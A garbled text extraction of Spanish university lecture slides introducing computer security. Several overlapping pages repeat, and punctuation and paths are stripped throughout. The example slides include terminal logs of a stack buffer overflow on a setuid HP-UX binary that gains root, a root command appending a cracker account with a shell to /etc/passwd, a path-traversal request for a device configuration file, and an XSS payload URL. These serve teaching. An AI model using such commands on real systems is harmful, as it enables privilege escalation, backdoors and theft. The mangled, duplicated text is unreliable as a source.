Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 17: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 18: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 19: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 20: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 21: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 22: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

